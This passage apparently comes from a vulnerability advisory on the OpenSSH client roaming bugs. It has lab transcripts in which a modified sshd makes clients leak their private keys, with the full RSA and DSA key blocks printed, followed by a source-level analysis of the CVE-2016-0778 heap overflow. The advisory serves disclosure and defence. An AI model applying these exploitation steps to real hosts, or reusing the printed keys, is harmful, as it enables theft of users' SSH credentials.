/tmp/roaming-35ee7ab0/infoleak\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-6cb31d82/infoleak\n... \nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n$ /usr/bin/ssh -V\nOpenSSH_7.0, LibreSSL 2.2.2\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL\nruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s\n17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8\nL/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh\nxSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP\nvavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl\nJka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP\nKyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19\nqJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY\ngQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK\nQolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt\ngKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL\ncQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB\n+s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl\nhcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri\nhBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh\nvhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O\nnFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG\n8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n-----END RSA PRIVATE KEY-----\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 1 %h %p\" -p 222 127.0.0.1\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n(this example requires a ProxyCommand because of the NULL-aitop bug\ndescribed in the Mitigating Factors of the Information Leak section, and\ncrashes because of the NULL-pointer dereference discussed in the\nMitigating Factors of the Buffer Overflow section)\n\n# cat /tmp/roaming-a5eca355/infoleak\nry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: CentOS 7, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"CentOS Linux 7 (Core)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n\nGLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2\nhUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-b7b16dfc/infoleak\njJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5\n\n# strings /tmp/roaming-b324ce87/infoleak\nIuQL\nR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9v\n\n# strings /tmp/roaming-24011739/infoleak\nKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC\n\n# strings /tmp/roaming-37456846/infoleak\nLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA\nyq4Kwj/\n\n# strings /tmp/roaming-988ff54c/infoleak\nGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\n\n# strings /tmp/roaming-53887fa5/infoleak\n/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: Fedora 20, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"Fedora 20 (Heisenbug)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz\nHLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp\no9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ\n/B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy\n2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr\nHiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\njwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm\nqK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\nZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-a2bbc5f6/infoleak\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG\n\n# strings /tmp/roaming-47b46456/infoleak\nRGAcE0nc\nGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9\n\n# strings /tmp/roaming-7a6717ae/infoleak\ncawMW4LZ1\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p\n\n# strings /tmp/roaming-f3091f08/infoleak\nlZ3w0qHe\nnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\n\n# strings /tmp/roaming-62a9e9a3/infoleak\nlZ3w0qHe\nr3TwTa0pPEk11\nLbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37P\n\n# strings /tmp/roaming-8de31ed5/infoleak\n7qyvNznQ\n26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\n\n# strings /tmp/roaming-f5e0fbcc/infoleak\nyESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxS\n\n# strings /tmp/roaming-9be933df/infoleak\nQRtzK/GpRuMC1\nC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT\n\n# strings /tmp/roaming-ee4d1e6c/infoleak\nSG3aTqYp\ntEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s\n\n# strings /tmp/roaming-c2bfd69c/infoleak\nSG3aTqYp\n6JmTOun5zVV6A\nH6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s\n\n# strings /tmp/roaming-2b3217a1/infoleak\nDGLfFGdO\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ\n\n# strings /tmp/roaming-1e275747/infoleak\ng3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\n\n\n========================================================================\nBuffer Overflow (CVE-2016-0778)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nSupport for roaming was elegantly added to the OpenSSH client: the calls\nto read() and write() that communicate with the SSH server were replaced\nby calls to roaming_read() and roaming_write(), two wrappers that depend\non wait_for_roaming_reconnect() to transparently reconnect to the server\nafter a disconnection. The wait_for_roaming_reconnect() routine is\nessentially a sequence of four subroutines:\n\n239 int\n240 wait_for_roaming_reconnect(void)\n241 {\n... \n250 fprintf(stderr, \"[connection suspended, press return to resume]\");\n... \n252 packet_backup_state();\n253 /* TODO Perhaps we should read from tty here */\n254 while ((c = fgetc(stdin)) != EOF) {\n... \n259 if (c != \u0027\\n\u0027 \u0026\u0026 c != \u0027\\r\u0027)\n260 continue;\n261\n262 if (ssh_connect(host, \u0026hostaddr, options.port,\n... \n265 options.proxy_command) == 0 \u0026\u0026 roaming_resume() == 0) {\n266 packet_restore_state();\n... \n268 fprintf(stderr, \"[connection resumed]\\n\");\n... \n270 return 0;\n271 }\n272\n273 fprintf(stderr, \"[reconnect failed, press return to retry]\");\n... \n275 }\n276 fprintf(stderr, \"[exiting]\\n\");\n... \n278 exit(0);\n279 }\n\n1. packet_backup_state() close()s connection_in and connection_out (the\nold file descriptors that connected the client to the server), and saves\nthe state of the suspended SSH session (for example, the encryption and\ndecryption contexts). \n\n2. ssh_connect() opens new file descriptors, and connects them to the\nSSH server. \n\n3. roaming_resume() negotiates the resumption of the suspended SSH\nsession with the server, and calls resend_bytes(). \n\n4. packet_restore_state() updates connection_in and connection_out (with\nthe new file descriptors that connect the client to the server), and\nrestores the state of the suspended SSH session. \n\nThe new file descriptors for connection_in and connection_out may differ\nfrom the old ones (if, for example, files or pipes or sockets are opened\nor closed between two successive ssh_connect() calls), but unfortunately\nhistorical code in OpenSSH assumes that they are constant:\n\n- In client_loop(), the variables connection_in and connection_out are\n cached locally, but packet_write_poll() calls roaming_write(), which\n may assign new values to connection_in and connection_out (if a\n reconnection occurs), and client_wait_until_can_do_something()\n subsequently reuses the old, cached values. \n\n- client_loop() eventually updates these cached values, and the\n following FD_ISSET() uses a new, updated file descriptor (the fd\n connection_out), but an old, out-of-date file descriptor set (the\n fd_set writeset). \n\n- packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API)\n first calloc()ates setp, a file descriptor set for connection_in;\n next, it loops around memset(), FD_SET(), select() and roaming_read();\n last, it free()s setp and returns. Unfortunately, roaming_read() may\n reassign a higher value to connection_in (if a reconnection occurs),\n but setp is never enlarged, and the following memset() and FD_SET()\n may therefore overflow setp (a heap-based buffer overflow):\n\n1048 int\n1049 packet_read_seqnr(u_int32_t *seqnr_p)\n1050 {\n.... \n1052 fd_set *setp;\n.... \n1058 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_in + 1,\n1059 NFDBITS), sizeof(fd_mask));\n.... \n1065 for (;;) {\n.... \n1075 if (type != SSH_MSG_NONE) {\n1076 free(setp);\n1077 return type;\n1078 }\n.... \n1083 memset(setp, 0, howmany(active_state-\u003econnection_in + 1,\n1084 NFDBITS) * sizeof(fd_mask));\n1085 FD_SET(active_state-\u003econnection_in, setp);\n.... \n1092 for (;;) {\n.... \n1097 if ((ret = select(active_state-\u003econnection_in + 1, setp,\n1098 NULL, NULL, timeoutp)) \u003e= 0)\n1099 break;\n.... \n1115 }\n.... \n1117 do {\n.... \n1119 len = roaming_read(active_state-\u003econnection_in, buf,\n1120 sizeof(buf), \u0026cont);\n1121 } while (len == 0 \u0026\u0026 cont);\n.... \n1130 }\n1131 /* NOTREACHED */\n1132 }\n\n- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is\n basically similar to packet_read_seqnr() and may overflow its own setp\n if roaming_write() (called by packet_write_poll()) reassigns a higher\n value to connection_out (after a successful reconnection):\n\n1739 void\n1740 packet_write_wait(void)\n1741 {\n1742 fd_set *setp;\n.... \n1746 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_out + 1,\n1747 NFDBITS), sizeof(fd_mask));\n1748 packet_write_poll();\n1749 while (packet_have_data_to_write()) {\n1750 memset(setp, 0, howmany(active_state-\u003econnection_out + 1,\n1751 NFDBITS) * sizeof(fd_mask));\n1752 FD_SET(active_state-\u003econnection_out, setp);\n.... \n1758 for (;;) {\n.... \n1763 if ((ret = select(active_state-\u003econnection_out + 1,\n1764 NULL, setp, NULL, timeoutp)) \u003e= 0)\n1765 break;\n.... \n1776 }\n.... \n1782 packet_write_poll();\n1783 }\n1784 free(setp);\n1785 }\n\n------------------------------------------------------------------------\nMitigating Factors\n------------------------------------------------------------------------\n\nThis buffer overflow affects all OpenSSH clients \u003e= 5.4, but its impact\nis significantly reduced by the Mitigating Factors detailed in the\nInformation Leak section, and additionally:\n\n- OpenSSH versions \u003e= 6.8 reimplement packet_backup_state() and\n packet_restore_state(), but introduce a bug that prevents the buffer\n overflow from being exploited; indeed, ssh_packet_backup_state() swaps\n two local pointers, ssh and backup_state, instead of swapping the two\n global pointers active_state and backup_state:\n\n 9 struct ssh *active_state, *backup_state;\n... \n238 void\n239 packet_backup_state(void)\n240 {\n241 ssh_packet_backup_state(active_state, backup_state);\n242 }\n243\n244 void\n245 packet_restore_state(void)\n246 {\n247 ssh_packet_restore_state(active_state, backup_state);\n248 }\n\n2269 void\n2270 ssh_packet_backup_state(struct ssh *ssh,\n2271 struct ssh *backup_state)\n2272 {\n2273 struct ssh *tmp;\n.... \n2279 if (backup_state)\n2280 tmp = backup_state;\n2281 else\n2282 tmp = ssh_alloc_session_state();\n2283 backup_state = ssh;\n2284 ssh = tmp;\n2285 }\n.... \n2291 void\n2292 ssh_packet_restore_state(struct ssh *ssh,\n2293 struct ssh *backup_state)\n2294 {\n2295 struct ssh *tmp;\n.... \n2299 tmp = backup_state;\n2300 backup_state = ssh;\n2301 ssh = tmp;\n2302 ssh-\u003estate-\u003econnection_in = backup_state-\u003estate-\u003econnection_in;\n\n As a result, the global pointer backup_state is still NULL when passed\n to ssh_packet_restore_state(), and crashes the OpenSSH client when\n dereferenced:\n\n# env ROAMING=\"overflow:A fd_leaks:0\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 15 %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n This bug prevents the buffer overflow from being exploited, but not\n the information leak, because the vulnerable function resend_bytes()\n is called before ssh_packet_restore_state() crashes. \n\n------------------------------------------------------------------------\nFile Descriptor Leak\n------------------------------------------------------------------------\n\nA back-of-the-envelope calculation indicates that, in order to increase\nthe file descriptor connection_in or connection_out, and thus overflow\nthe file descriptor set setp in packet_read_seqnr() or\npacket_write_wait(), a file descriptor leak is needed:\n\n- First, the number of bytes calloc()ated for setp is rounded up to the\n nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors)\n on 64-bit systems. \n\n- Next, in glibc, this number is rounded up to the nearest multiple of\n MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit\n systems. \n\n- Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit\n systems, of which 24 bytes (or 192 file descriptors) are reserved for\n setp. \n\n- In conclusion, a file descriptor leak is needed, because connection_in\n or connection_out has to be increased by hundreds in order to overflow\n setp. \n\nThe search for a suitable file descriptor leak begins with a study of\nthe behavior of the four ssh_connect() methods, when called for a\nreconnection by wait_for_roaming_reconnect():\n\n1. The default method ssh_connect_direct() communicates with the server\nthrough a simple TCP socket: the two file descriptors connection_in and\nconnection_out are both equal to this socket\u0027s file descriptor. \n\nIn wait_for_roaming_reconnect(), the low-numbered file descriptor of the\nold TCP socket is close()d by packet_backup_state(), but immediately\nreused for the new TCP socket in ssh_connect_direct(): the new file\ndescriptors connection_in and connection_out are equal to this old,\nlow-numbered file descriptor, and cannot possibly overflow setp. \n\n2. The special ProxyCommand \"-\" communicates with the server through\nstdin and stdout, but (as explained in the Mitigating Factors of the\nInformation Leak section) it cannot possibly reconnect to the server,\nand is therefore immune to this buffer overflow. \n\n3. Surprisingly, we discovered a file descriptor leak in the\nssh_proxy_fdpass_connect() method itself; indeed, the file descriptor\nsp[1] is never close()d:\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 106 int sp[2], sock;\n ... \n 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) \u003c 0)\n 114 fatal(\"Could not create socketpair to communicate with \"\n 115 \"proxy dialer: %.100s\", strerror(errno));\n ... \n 161 close(sp[0]);\n ... \n 164 if ((sock = mm_receive_fd(sp[1])) == -1)\n 165 fatal(\"proxy dialer did not pass back a connection\");\n ... \n 171 /* Set the connection file descriptors. */\n 172 packet_set_connection(sock, sock);\n 173\n 174 return 0;\n 175 }\n\nHowever, two different reasons prevent this file descriptor leak from\ntriggering the setp overflow:\n\n- The method ssh_proxy_fdpass_connect() communicates with the server\n through a single socket received from the ProxyCommand: the two file\n descriptors connection_in and connection_out are both equal to this\n socket\u0027s file descriptor. \n\n In wait_for_roaming_reconnect(), the low-numbered file descriptor of\n the old socket is close()d by packet_backup_state(), reused for sp[0]\n in ssh_proxy_fdpass_connect(), close()d again, and eventually reused\n again for the new socket: the new file descriptors connection_in and\n connection_out are equal to this old, low-numbered file descriptor,\n and cannot possibly overflow setp. \n\n- Because of the waitpid() bug described in the Mitigating Factors of\n the Information Leak section, the method ssh_proxy_fdpass_connect()\n calls fatal() before it returns to wait_for_roaming_reconnect(), and\n is therefore immune to this buffer overflow. \n\n4. The method ssh_proxy_connect() communicates with the server through a\nProxyCommand and two different pipes: the file descriptor connection_in\nis the read end of the second pipe (pout[0]), and the file descriptor\nconnection_out is the write end of the first pipe (pin[1]):\n\n 180 static int\n 181 ssh_proxy_connect(const char *host, u_short port, const char *proxy_command)\n 182 {\n ... \n 184 int pin[2], pout[2];\n ... \n 192 if (pipe(pin) 